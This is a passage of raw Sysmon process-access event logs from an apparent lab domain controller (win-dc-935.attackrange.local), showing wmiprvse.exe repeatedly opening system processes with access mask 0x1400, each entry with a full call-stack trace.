13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004825Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004824Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004823Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004822Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004821Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004820Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004819Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004818Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004817Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004816Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004815Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004814Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004813Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004812Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004811Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004810Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 